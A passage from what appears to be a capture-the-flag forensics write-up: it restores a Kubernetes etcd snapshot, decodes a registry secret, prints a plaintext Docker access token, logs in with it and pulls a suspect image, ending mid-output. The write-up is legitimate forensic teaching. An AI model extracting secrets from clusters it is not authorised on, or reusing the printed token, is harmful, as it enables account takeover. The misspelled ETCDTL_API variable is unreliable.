&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;annotations:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;kubeadm.kubernetes.io/kube-apiserver.advertise-address.endpoint:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;172.18&lt;/span&gt;&lt;span class=&#34;number&#34;&gt;.0&lt;/span&gt;&lt;span class=&#34;number&#34;&gt;.2&lt;/span&gt;&lt;span class=&#34;string&#34;&gt;:6443&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;component:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kube-apiserver&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;tier:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;control-plane&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kube-apiserver&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kube-system&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;command:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kube-apiserver&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;string&#34;&gt;...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;--encryption-provider-config=/etc/kubernetes/enc/enc.yaml&lt;/span&gt;  &lt;span class=&#34;comment&#34;&gt;# &amp;lt;-- add this line&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;volumeMounts:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;string&#34;&gt;...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;enc&lt;/span&gt;                           &lt;span class=&#34;comment&#34;&gt;# &amp;lt;-- add this line&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;mountPath:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/etc/kubernetes/enc&lt;/span&gt;      &lt;span class=&#34;comment&#34;&gt;# &amp;lt;-- add this line&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;readonly:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;true&lt;/span&gt;                      &lt;span class=&#34;comment&#34;&gt;# &amp;lt;-- add this line&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;string&#34;&gt;...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;volumes:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;string&#34;&gt;...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;enc&lt;/span&gt;                             &lt;span class=&#34;comment&#34;&gt;# &amp;lt;-- add this line&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;hostPath:&lt;/span&gt;                             &lt;span class=&#34;comment&#34;&gt;# &amp;lt;-- add this line&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;path:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/etc/kubernetes/enc&lt;/span&gt;           &lt;span class=&#34;comment&#34;&gt;# &amp;lt;-- add this line&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;type:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;DirectoryOrCreate&lt;/span&gt;             &lt;span class=&#34;comment&#34;&gt;# &amp;lt;-- add this line&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;string&#34;&gt;...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After changing the manifest the api-server will be stopped and down. If you did it corretly, you need to wait a few seconds until the api-server works again!&lt;/p&gt;
&lt;p&gt;After configuring the api-server correctly let’s take the content  &lt;code&gt;/var/lib/netcd&lt;/code&gt;  and try to use the  &lt;code&gt;db&lt;/code&gt;  as our snapshot that we want to restore it!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/fu0HEsS.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;I suggest to copy  &lt;code&gt;db&lt;/code&gt;  inside the control-plane node (in this case container). I will copy it to one of the extraMounts of kind.&lt;/p&gt;
&lt;p&gt;Now let’s open a shell inside the control-plane container:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;docker &lt;span class=&#34;built_in&#34;&gt;exec&lt;/span&gt; -it kind-control-plane bash&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now we need to use an utility called etcdctl that will help us to interact with the etcd server.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;apt update &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;apt install etcd-client&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After install it succesfully. An important thing it must be done. Don’t skip this step! you must export an env variable to make etcdctl behave as we need!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;export&lt;/span&gt; ETCDTL_API=3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;now it’s time to use this utility! There is a resotre command in this utility that allow us to restore the backup or the snapshot&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;etcdctl --endpoints=https://[etcd-server] \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--cacert=&amp;lt;path-to-ca-certification&amp;gt; \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--cert=&amp;lt;path-to-etcd-server-cert&amp;gt; \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--key=&amp;lt;path-to-etcd-server-key&amp;gt; \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--data-dir &amp;lt;path-to-restored-data&amp;gt; \ &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;snapshot restore &amp;lt;path-to-snapshot&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;You need to fill this arguments with your own. you can get theses information from  &lt;code&gt;/etc/kubernetes/manifests/etcd.yaml&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;In my case the command it will be like this:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;ETCDTL_API=3 etcdctl --endpoints=https://[127.0.0.1:2379] \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--cacert=/etc/kubernetes/pki/etcd/ca.crt \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--cert=/etc/kubernetes/pki/etcd/server.crt \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--key=/etc/kubernetes/pki/etcd/server.key \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--data-dir /var/lib/etcd-backup \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;snapshot restore ./db&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;You migth get an error or warning about hash stuff after running this command. Skip it! Let’s check if  &lt;code&gt;/var/lib/etcd-backup&lt;/code&gt;  directory is created and if it contains  &lt;code&gt;member&lt;/code&gt;  directory!&lt;/p&gt;
&lt;p&gt;If you got it! Then you are on the right way! Now it’s time to do the crazy thing! Let’s replace our new data placed in  &lt;code&gt;/var/lib/etcd-backup/member/snap&lt;/code&gt;  to the original etcd database!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;cp&lt;/span&gt; /var/lib/etcd-backup/member/snap/db /var/lib/etcd/member/snap/&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Just wait few seconds! and try a kubectl command!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kubectl get nodes&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                  STATUS     ROLES           AGE   VERSION&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kind-control-plane    NotReady   &amp;lt;none&amp;gt;          51m   v1.25.3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kind-worker           NotReady   &amp;lt;none&amp;gt;          51m   v1.25.3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;quals-control-plane   Ready      control-plane   26h   v1.25.3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;quals-worker          Ready      &amp;lt;none&amp;gt;          26h   v1.25.3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingo! It works fine! but as you see here we have nodes naming issues cause of the data of the etcd!&lt;/p&gt;
&lt;p&gt;Let’s check if we have a secret object or not!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kubectl get secrets&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME      TYPE                             DATA   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;regcred   kubernetes.io/dockerconfigjson   1      26h&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And Yes!!! We got our secret! Let’s now inspect the data inside it!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt; kubectl get secret regcred -o jsonpath=&lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;#123;.data.\.dockerconfigjson&amp;#125;&amp;#x27;&lt;/span&gt; | &lt;span class=&#34;built_in&#34;&gt;base64&lt;/span&gt; -d&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;#123;&lt;span class=&#34;string&#34;&gt;&amp;quot;auths&amp;quot;&lt;/span&gt;:&amp;#123;&lt;span class=&#34;string&#34;&gt;&amp;quot;docker.io&amp;quot;&lt;/span&gt;:&amp;#123;&lt;span class=&#34;string&#34;&gt;&amp;quot;username&amp;quot;&lt;/span&gt;:&lt;span class=&#34;string&#34;&gt;&amp;quot;medrafk8s&amp;quot;&lt;/span&gt;,&lt;span class=&#34;string&#34;&gt;&amp;quot;password&amp;quot;&lt;/span&gt;:&lt;span class=&#34;string&#34;&gt;&amp;quot;dckr_pat_MLkRjYtjdk7dwT80W_dx3VTuac8&amp;quot;&lt;/span&gt;,&lt;span class=&#34;string&#34;&gt;&amp;quot;auth&amp;quot;&lt;/span&gt;:&lt;span class=&#34;string&#34;&gt;&amp;quot;bWVkcmFmazhzOmRja3JfcGF0X01Ma1JqWXRqZGs3ZHdUODBXX2R4M1ZUdWFjOA==&amp;quot;&lt;/span&gt;&amp;#125;&amp;#125;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And finally! The registry is  &lt;code&gt;docker.io&lt;/code&gt; , the username is  &lt;code&gt;medrafk8s&lt;/code&gt;  and the password is  &lt;code&gt;dckr_pat_MLkRjYtjdk7dwT80W_dx3VTuac8&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;With this creds we can pull the container that host the malicious binary and analyse his traffic! Let’s do it!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ docker login docker.io -u medrafk8s -p dckr_pat_MLkRjYtjdk7dwT80W_dx3VTuac8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;WARNING! Using --password via the CLI is insecure. Use --password-stdin.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Login Succeeded&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s pull this image now!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ docker pull medrafk8s/kubersex&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Using default tag: latest&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;latest: Pulling from medrafk8s/kubersex&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;c158987b0551: Pull complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;1e35f6679fab: Pull complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;cb9626c74200: Pull complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;b6334b6ace34: Pull complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;f1d1c9928c82: Pull complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9b6f639ec6ea: Pull complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ee68d3549ec8: Downloading [=======&amp;gt;                                           ]  1.813MB/11.49MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4caa31e6cbc5: Download complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;a1434f597582: Waiting&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;The 1st i used to do when I pull a container image in forensics challenges is to check the layers of the image!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ docker &lt;span class=&#34;built_in&#34;&gt;history&lt;/span&gt; medrafk8s/kubersex&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;IMAGE          CREATED          CREATED BY                                      SIZE      COMMENT&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;77a3b3f4c35c   13 minutes ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  CMD [&amp;quot;nginx&amp;quot; &amp;quot;-g&amp;quot; &amp;quot;daemon…   0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0b383b70426b   13 minutes ago   /bin/sh -c &lt;span class=&#34;built_in&#34;&gt;rm&lt;/span&gt; Serial-Key.txt                    0B&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;b6ca15406c7d   13 minutes ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  EXPOSE 80                    0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;64eaf6945cd1   13 minutes ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:ed75fc1a725ff91b…   20B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;748d1b219207   13 minutes ago   /bin/sh -c 